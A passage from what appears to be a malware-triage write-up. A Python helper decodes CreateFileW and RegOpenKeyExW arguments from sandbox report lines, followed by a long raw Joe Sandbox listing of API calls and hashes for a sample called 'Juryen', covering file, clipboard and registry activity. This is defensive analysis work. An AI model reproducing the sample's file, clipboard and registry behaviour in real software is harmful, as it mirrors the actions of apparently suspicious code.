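                composites: Optional[Dict[int, str]] = None) -> List[str]:
    """Name a bitmask: exact composite first, otherwise the individual flag bits plus any remainder."""
    if composites and value in composites:
        return [composites[value]]
    names = [name for bit, name in sorted(bits.items()) if value & bit]
    rest = value & ~sum(bits)             # bits the table does not know
    if rest:
        names.append(f"0x{rest:X}")
    return names or ["0"]


def explain(line: str) -> Dict[str, object]:
    """Map the leading stack words onto the stdcall parameters of the APIs handled here."""
    call = parse_call(line)
    w = call["words"]
    out: Dict[str, object] = {"api": call["api"], "ref": f"{call['ref']:08X}"}
    # CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    #             dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)
    if call["api"] in ("CreateFileW", "CreateFileA") and len(w) >= 5 \
            and all(isinstance(w[i], int) for i in (1, 2, 4)):
        out["access"] = decode_mask(w[1], GENERIC_ACCESS)
        out["share"] = decode_mask(w[2], FILE_SHARE)
        out["disposition"] = CREATION_DISPOSITION.get(w[4], f"0x{w[4]:X}")
        # Writes to disk only if write access is requested and the disposition can create/truncate.
        out["may_write"] = bool(w[1] & 0x40000000) and w[4] in (1, 2, 4, 5)
    # RegOpenKeyExW(hKey, lpSubKey, ulOptions, samDesired, phkResult)
    elif call["api"] in ("RegOpenKeyExW", "RegOpenKeyExA") and len(w) >= 4 \
            and isinstance(w[0], int) and isinstance(w[3], int):
        out["hive"] = HKEY.get(w[0], f"0x{w[0]:X}")
        out["sam"] = decode_mask(w[3], KEY_BITS, KEY_COMPOSITE)
        # The subkey text may sit in a later slot than lpSubKey, so collect every resolved string.
        out["strings"] = [x for x in w if isinstance(x, str)]
    return out


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Decode a batch of report lines; unknown APIs keep only name and address."""
    return [explain(line) for line in lines]


if __name__ == "__main__":
    for entry in triage(REPORT_LINES):
        print(entry)
```

Run against the three lines from this page the helper reports the first CreateFileW as a GENERIC_WRITE/CREATE_ALWAYS open (a file being written), the second as a GENERIC_READ/OPEN_EXISTING open shared for read and write, and the RegOpenKeyExW as a KEY_READ open of HKLM with the `Shell Folders` path recovered from the resolved string slot.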
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                    • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004095FC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3655998216-0
                                                                    • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                    • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00445426
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                    • String ID:
                                                                    • API String ID: 1828521557-0
                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                    APIs
                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                    • memset.MSVCRT ref: 0042BFC0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: a0780bb49d8a07aeac5707b5a6201decdf5b3787da807124ae81a49ee348ef3f
                                                                    • Instruction ID: 98d7c88e32de7b71128496fa216618f30369d33ff21347cb3a36463818225643
                                                                    • Opcode Fuzzy Hash: a0780bb49d8a07aeac5707b5a6201decdf5b3787da807124ae81a49ee348ef3f
                                                                    • Instruction Fuzzy Hash: A7012B327009226BD700AB29AC41A4AB3D8EFD4314B16402FF508D7341EF78EC114BD8
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID:
                                                                    • API String ID: 2081463915-0
                                                                    • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                    • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                    APIs
                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                    • String ID:
                                                                    • API String ID: 2136311172-0
                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                    APIs
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                    • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                    • Opcode Fuzzy Hash: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                    • Opcode Fuzzy Hash: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: c04c0335ba9332e1d7a11915a44761c0e0363b535bb0446cda30cb285f4c8f6b
                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                    • Opcode Fuzzy Hash: c04c0335ba9332e1d7a11915a44761c0e0363b535bb0446cda30cb285f4c8f6b
                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                    APIs
                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                    • String ID:
                                                                    • API String ID: 3604893535-0
                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                    • API String ID: 2780580303-317687271
                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                    APIs
                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                    • String ID:
                                                                    • API String ID: 1213725291-0
                                                                    • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                    • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                    • free.MSVCRT ref: 00418370
                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                    • String ID: OsError 0x%x (%u)
                                                                    • API String ID: 2360000266-2664311388
                                                                    • Opcode ID: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                    • Opcode Fuzzy Hash: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 1865533344-0
                                                                    • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                    • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                    APIs
                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: NtdllProc_Window
                                                                    • String ID:
                                                                    • API String ID: 4255912815-0
                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                    APIs
                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                    • memset.MSVCRT ref: 0040265F
                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
